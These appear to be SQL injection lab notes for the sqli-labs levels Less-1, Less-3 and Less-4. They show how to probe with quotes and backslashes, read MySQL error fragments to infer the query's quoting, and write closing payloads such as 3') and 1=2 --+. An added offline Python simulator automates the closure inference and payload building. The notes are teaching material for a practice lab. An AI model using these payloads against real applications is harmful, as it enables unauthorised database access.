To look for an injection point, change the id value in the URL to a normal number, a very large number, characters (a single quote, a double quote, two single quotes, brackets) and a backslash \, and watch whether the page changes or the database throws an error
Less-1 (closed with single quotes)
Append a single quote to the id so the query throws an error
Copy the error message out
Error statement:
''3'' LIMIT 0,1'
' '3'' LIMIT 0,1 '
The outermost ' on the left and right come from the error message itself (MySQL always wraps the "near" fragment in single quotes), whatever the application does
'3'' LIMIT 0,1
After removing the message's own quotes on both sides, the ' on each side of the value is the quoting the application puts around a string parameter; what is left in the middle
3'
is the user input
Guessed SQL statement: Select login_name,password from admin where id='3'' limit 0,1
So the closing character is '
Less-3 (single quotes and parentheses)
Again append a single quote
Error message:
''3'') LIMIT 0,1'
' '3'') LIMIT 0,1 '
The outermost ' on the left and right come from the error message itself, whatever the application does
'3'') LIMIT 0,1
Remove the message's quotes; the ' single quotes and the bracket around the value belong to the application. Removing the application's quotes leaves
3') LIMIT 0,1
3' is the user input; the ) after it belongs to the application, so our payload has to close that bracket too
('3'') LIMIT 0,1
The application supplies the ( on the left, so our input must supply the ') that balances it
Guessed SQL statement: Select login_name,password from admin where id=('3'') limit 0,1
Injection payloads:
First close with ') and append and 1=1
Then the same with and 1=2 (the page should differ if the condition is really evaluated)
Guessed SQL statement
before closing:
Guess the sql statement Select login_name,password from admin where id=('3' and 1=2') limit 0,1
After using closure:
Guessed SQL statement: Select login_name,password from admin where id=('3') and 1=2 --+ ') limit 0,1
The 3 is no longer inside the brackets: our ') closes the application's ('3 ahead of the condition, and the comment removes the application's own ') limit 0,1 that follows
Less-4 (use double quotes and parentheses to close)
Appending a single quote produces no error
Neither does ')
The page still renders normally
The reason is that the value is wrapped in double quotes and brackets, (" ")
An input such as 3'))))) therefore becomes "3')))))"
Inside a double-quoted string the single quotes and brackets are just characters of that string. MySQL then compares the string "3')))))" with the integer id column, implicitly converts it to 3, and the page renders normally whatever we append. A backslash \, however, escapes the closing double quote and breaks the query
So probe with the backslash \
This reports an error
Error message:
'"3\") LIMIT 0,1'
' "3\") LIMIT 0,1 '
The outermost ' on the left and right come from the error message itself, whatever the application does
"3\") LIMIT 0,1
Remove the message's quotes; the " double quotes and the bracket around the value belong to the application. Removing the application's quotes leaves
3\) LIMIT 0,1
3\ is the user input (the backslash has swallowed the closing "); the ) is the application's, so we must close it
("3\")
The application supplies the (" on the left, so our input must supply the ") that balances it
Guessed SQL statement: Select login_name,password from admin where id=("3\") limit 0,1
Constructed SQL statement:
Select login_name,password from admin where id=("3") and 1=2 --+ ") limit 0,1
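The three levels above all follow one procedure: send a probe, read the fragment MySQL prints after "near", strip the message's own quotes, subtract the application's quoting, and build a payload that closes it and comments out the rest. The Python below is an added example, not part of these notes or of the sqli-labs code: it models the vulnerable page with the query templates the notes guess for each level (an assumption, not the real source) and a small scanner that approximates where MySQL's lexer stops, so the inference steps can be replayed offline. It generalises the backslash probe from Less-4 to every level, since a lone \ breaks any quoted string while ' does not break a double-quoted one.

```python
import re

# Assumed query shapes, taken from the notes' guesses (the real sqli-labs source may differ).
TEMPLATES = {
    "Less-1": "SELECT login_name,password FROM admin WHERE id='{}' LIMIT 0,1",
    "Less-3": "SELECT login_name,password FROM admin WHERE id=('{}') LIMIT 0,1",
    "Less-4": 'SELECT login_name,password FROM admin WHERE id=("{}") LIMIT 0,1',
    "numeric": "SELECT login_name,password FROM admin WHERE id={} LIMIT 0,1",  # assumed extra case
}

def build_query(template, user_input):
    """The vulnerable page interpolates the id parameter with no escaping."""
    return template.format(user_input)

def mysql_error_near(sql):
    """Return None if the statement scans cleanly, otherwise the fragment MySQL
    would print after 'near'. This is an approximation of the real lexer: it
    knows ' and " strings with backslash escapes and doubled-quote escapes,
    '-- ' and '#' comments, and bracket balance, and nothing else."""
    i, n, depth = 0, len(sql), 0
    while i < n:
        c = sql[i]
        if c in "'\"":
            start, i = i, i + 1
            while True:
                if i >= n:
                    return sql[start:]            # unterminated string: fragment starts at its opening quote
                if sql[i] == "\\":
                    i += 2                        # backslash escapes the next character
                elif sql[i] == c:
                    if i + 1 < n and sql[i + 1] == c:
                        i += 2                    # '' or "" inside a string is an escaped quote
                    else:
                        i += 1
                        break
                else:
                    i += 1
        elif sql.startswith("-- ", i) or c == "#":
            break                                 # comment runs to end of input
        elif c == "\\":
            return sql[i:]                        # stray backslash outside a string
        elif c == "(":
            depth, i = depth + 1, i + 1
        elif c == ")":
            if depth == 0:
                return sql[i:]                    # closing bracket with no opener
            depth, i = depth - 1, i + 1
        else:
            i += 1
    return "" if depth > 0 else None              # an unclosed '(' errors at end of input (near '')

def error_message(near):
    """Format the fragment the way MySQL prints it: the outer quotes are the message's own."""
    return "You have an error in your SQL syntax; near '%s' at line 1" % near

def near_from_message(msg):
    """First step in the notes: strip the message's own quotes to recover the fragment."""
    m = re.search(r"near '(.*)' at line \d+$", msg)
    return m.group(1) if m else None

def infer_closure(template):
    """Probe with a lone backslash. Inside any quoted string it swallows the closing
    quote, so the fragment starts at the application's opening quote and shows the
    bracket(s) that follow the value: quote + brackets is exactly what we must close."""
    near = mysql_error_near(build_query(template, "\\"))
    if near is None or near[0] == "\\":
        return ""                                 # numeric context: nothing to close
    quote = near[0]
    rest = near[3:]                               # skip <quote> \ <escaped quote>
    brackets = rest[:len(rest) - len(rest.lstrip(")"))]
    return quote + brackets

def payload(closure, condition):
    """Close the application's quoting, append our condition, comment out the tail
    (in a URL the trailing '-- -' is usually written as '--+')."""
    return "3%s %s -- -" % (closure, condition)

if __name__ == "__main__":
    for level, tpl in TEMPLATES.items():
        probe = mysql_error_near(build_query(tpl, "3'"))
        print(level, "probe 3' ->", "page normal" if probe is None else error_message(probe))
        closure = infer_closure(tpl)
        q = build_query(tpl, payload(closure, "and 1=2"))
        print("   closure", repr(closure), "->", q, "| ok" if mysql_error_near(q) is None else "| error")
```

Running it reproduces the fragments quoted in the notes for Less-1, Less-3 and Less-4, shows that the single-quote probe is silent on Less-4 while the backslash is not, and confirms that the payload built from the inferred closure scans cleanly on every level.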